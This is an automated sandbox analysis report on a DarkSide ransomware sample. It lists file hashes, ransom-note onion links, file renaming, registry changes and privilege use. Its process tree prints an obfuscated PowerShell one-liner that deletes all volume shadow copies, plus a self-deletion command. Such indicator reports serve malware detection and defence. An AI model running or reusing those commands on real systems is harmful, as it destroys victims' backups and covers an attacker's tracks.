Analysis
-
max time kernel
116s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-06-2023 20:15
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win7-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\Admin\README.6a2c0f68.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (183) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Darkside.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\SubmitRequest.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ConfirmStop.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\DebugClose.png.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ExpandFormat.png.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\ExpandResume.tiff => C:\Users\Admin\Pictures\ExpandResume.tiff.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ExpandResume.tiff.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\FormatInvoke.tif => C:\Users\Admin\Pictures\FormatInvoke.tif.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\FormatInvoke.tif.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\SubmitRequest.tif => C:\Users\Admin\Pictures\SubmitRequest.tif.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\ConfirmStop.tif => C:\Users\Admin\Pictures\ConfirmStop.tif.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\DebugClose.png => C:\Users\Admin\Pictures\DebugClose.png.6a2c0f68 Darkside.exe File renamed C:\Users\Admin\Pictures\ExpandFormat.png => C:\Users\Admin\Pictures\ExpandFormat.png.6a2c0f68 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ExpandResume.tiff Darkside.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2116 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
minesweeper.exedescription ioc process File opened for modification C:\Users\Admin\Saved Games\Microsoft Games\desktop.ini minesweeper.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft Games\Minesweeper\desktop.ini minesweeper.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\6a2c0f68.BMP" Darkside.exe Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\6a2c0f68.BMP" Darkside.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 1560 Darkside.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallpaperStyle = "10" Darkside.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{765C5961-0182-11EE-87F5-6E0AA2656971} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe -
Modifies registry class 14 IoCs
Processes:
Darkside.exeminesweeper.exerundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68 Darkside.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6} minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft\Windows minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft minesweeper.exe Set value (int) \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\LastPlayed = "0" minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats minesweeper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68\ = "6a2c0f68" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon Darkside.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX minesweeper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6a2c0f68.ico" Darkside.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_CLASSES\Local Settings\Software minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeDarkside.exepid process 1524 powershell.exe 1560 Darkside.exe 1560 Darkside.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
minesweeper.exepid process 1996 minesweeper.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
Darkside.exepowershell.exevssvc.exeAUDIODG.EXEdescription pid process Token: SeIncreaseQuotaPrivilege 1560 Darkside.exe Token: SeSecurityPrivilege 1560 Darkside.exe Token: SeTakeOwnershipPrivilege 1560 Darkside.exe Token: SeLoadDriverPrivilege 1560 Darkside.exe Token: SeSystemProfilePrivilege 1560 Darkside.exe Token: SeSystemtimePrivilege 1560 Darkside.exe Token: SeProfSingleProcessPrivilege 1560 Darkside.exe Token: SeIncBasePriorityPrivilege 1560 Darkside.exe Token: SeCreatePagefilePrivilege 1560 Darkside.exe Token: SeBackupPrivilege 1560 Darkside.exe Token: SeRestorePrivilege 1560 Darkside.exe Token: SeShutdownPrivilege 1560 Darkside.exe Token: SeDebugPrivilege 1560 Darkside.exe Token: SeSystemEnvironmentPrivilege 1560 Darkside.exe Token: SeRemoteShutdownPrivilege 1560 Darkside.exe Token: SeUndockPrivilege 1560 Darkside.exe Token: SeManageVolumePrivilege 1560 Darkside.exe Token: 33 1560 Darkside.exe Token: 34 1560 Darkside.exe Token: 35 1560 Darkside.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeBackupPrivilege 1372 vssvc.exe Token: SeRestorePrivilege 1372 vssvc.exe Token: SeAuditPrivilege 1372 vssvc.exe Token: 33 972 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 972 AUDIODG.EXE Token: 33 972 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 972 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
minesweeper.exeiexplore.exepid process 1996 minesweeper.exe 1996 minesweeper.exe 1996 minesweeper.exe 1996 minesweeper.exe 2160 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2160 iexplore.exe 2160 iexplore.exe 2220 IEXPLORE.EXE 2220 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
Darkside.exeiexplore.exedescription pid process target process PID 1560 wrote to memory of 1524 1560 Darkside.exe powershell.exe PID 1560 wrote to memory of 1524 1560 Darkside.exe powershell.exe PID 1560 wrote to memory of 1524 1560 Darkside.exe powershell.exe PID 1560 wrote to memory of 1524 1560 Darkside.exe powershell.exe PID 1560 wrote to memory of 2116 1560 Darkside.exe cmd.exe PID 1560 wrote to memory of 2116 1560 Darkside.exe cmd.exe PID 1560 wrote to memory of 2116 1560 Darkside.exe cmd.exe PID 1560 wrote to memory of 2116 1560 Darkside.exe cmd.exe PID 2160 wrote to memory of 2220 2160 iexplore.exe IEXPLORE.EXE PID 2160 wrote to memory of 2220 2160 iexplore.exe IEXPLORE.EXE PID 2160 wrote to memory of 2220 2160 iexplore.exe IEXPLORE.EXE PID 2160 wrote to memory of 2220 2160 iexplore.exe IEXPLORE.EXE -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe"C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe"1⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4581⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\WaitTrace.vssx1⤵
- Modifies registry class
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\WaitStep.mht1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft Games\Minesweeper\MinesweeperSettings.xmlFilesize
11KB
MD5691ebe3f06f86a389edffe869aacc696
SHA14097c7c80b984736f2aa09778cb23fffb9a10931
SHA2562b8437be1bb0800cc7944ff92e4d3653bb673688473f173f2e8d2c077db38a0c
SHA51211604e9bbe0c5ae5bf58cfcb96228ac8c7ab29f7d8342a769bf110fc80a630ef93f470e79f5beaec6d25a1584912b40fa6fcb5c973e0971a56ea346b29adfd81
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestatsFilesize
3KB
MD5d989d55ba606463e6a539ca0bd91fc08
SHA1156197fb5df94b8afe08b53de09a5854cc687e81
SHA2564b81636432d2b454bfd66d6032eb090f6c0b58c109049731b57c4f3d1e06bfc0
SHA512ffa45e9c843c490155cc6e531e2373f5ee757737390044607ad9f7dbd3593b4f7c3f1ee41b0147dfacd17618789eb017996df0615a3f7160ba1e1bc6ec990517
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestatsFilesize
3KB
MD540cf868237f73f6333b7e82f32da7a01
SHA1d566e7048cb82c72736f4c7c8679c2e2f6a082aa
SHA256d51d7e27a660e9606cc6d0c7c52bd98744178cff36791ffca6ccaa614071aa57
SHA51263aae1ef90a485789ee96ff6f89447afb8e605ddf281c35c8cbf63081c9785136d36b6df0958c869c9f267008f2f7a0a0d1bf18cfdefe2e0b4e643be309dc009
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestatsFilesize
3KB
MD511b1cb66abbbe81e007ddd2959f6b068
SHA1f87a67ffe354b00cbb2f492701b6429762e9c87f
SHA256cb5314886a9d885e9d9df33497476223bd30ead81d8cd8ddb7a977bf15675184
SHA512efcba4aaddaea5e60c120811bf8e04664fea877b4fdf3559aac086a68ad679a8561d43b53a76ee6bef5d5ca8b4bd452a22082ed8a68a78ead7bde02b106230bb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestatsFilesize
3KB
MD511b1cb66abbbe81e007ddd2959f6b068
SHA1f87a67ffe354b00cbb2f492701b6429762e9c87f
SHA256cb5314886a9d885e9d9df33497476223bd30ead81d8cd8ddb7a977bf15675184
SHA512efcba4aaddaea5e60c120811bf8e04664fea877b4fdf3559aac086a68ad679a8561d43b53a76ee6bef5d5ca8b4bd452a22082ed8a68a78ead7bde02b106230bb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5e414cb852621a45ab56df9d6cc8b3570
SHA1a4f6e54121b9a53501e0db0e46df2245d9572c1c
SHA2561f14b82c3fc0f3c779b377245369d9ea52b4629ea64f1733d76fe7e848d530e1
SHA512385a2619b62d4dbed7ddccca8c05d5c9677cbcc67d2eeb9528d3f0abe95c2f7661380e2f3f425756e3e2c7008a7b67f679637b83d34c11c824644d1f61845ade
-
C:\Users\Admin\README.6a2c0f68.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
C:\Users\Admin\Saved Games\Microsoft Games\desktop.iniFilesize
83B
MD55ebf28b909ec9614ce70c28c01dce063
SHA134333279d521ad30421f32947cec3cacd361cdcb
SHA2568c8c439af830f98d5c42a7fad1d3bc2ae510d97075b312b94c48cdc7ec6d5054
SHA51255867d4701c232be95f282a7a3a6abf157145a3e0351d2337538ef63c9af19572df9f64ec9db94edf5b3cd591653d9effde192e260b64eb864d1aeb158946e90
-
memory/1524-62-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/1524-61-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/1524-59-0x000000001B490000-0x000000001B772000-memory.dmpFilesize
2.9MB
-
memory/1524-60-0x0000000001DE0000-0x0000000001DE8000-memory.dmpFilesize
32KB
-
memory/1996-315-0x0000000000260000-0x000000000026A000-memory.dmpFilesize
40KB
-
memory/1996-79-0x0000000000380000-0x0000000000381000-memory.dmpFilesize
4KB
-
memory/1996-314-0x0000000000260000-0x000000000026A000-memory.dmpFilesize
40KB
-
memory/1996-76-0x0000000000260000-0x000000000026A000-memory.dmpFilesize
40KB
-
memory/1996-316-0x0000000000380000-0x0000000000381000-memory.dmpFilesize
4KB
-
memory/1996-326-0x0000000001E70000-0x0000000001E7A000-memory.dmpFilesize
40KB
-
memory/1996-78-0x0000000000260000-0x000000000026A000-memory.dmpFilesize
40KB
-
memory/1996-235-0x0000000001E70000-0x0000000001E7A000-memory.dmpFilesize
40KB
-
memory/1996-77-0x0000000000260000-0x000000000026A000-memory.dmpFilesize
40KB
-
memory/1996-354-0x0000000000260000-0x0000000000262000-memory.dmpFilesize
8KB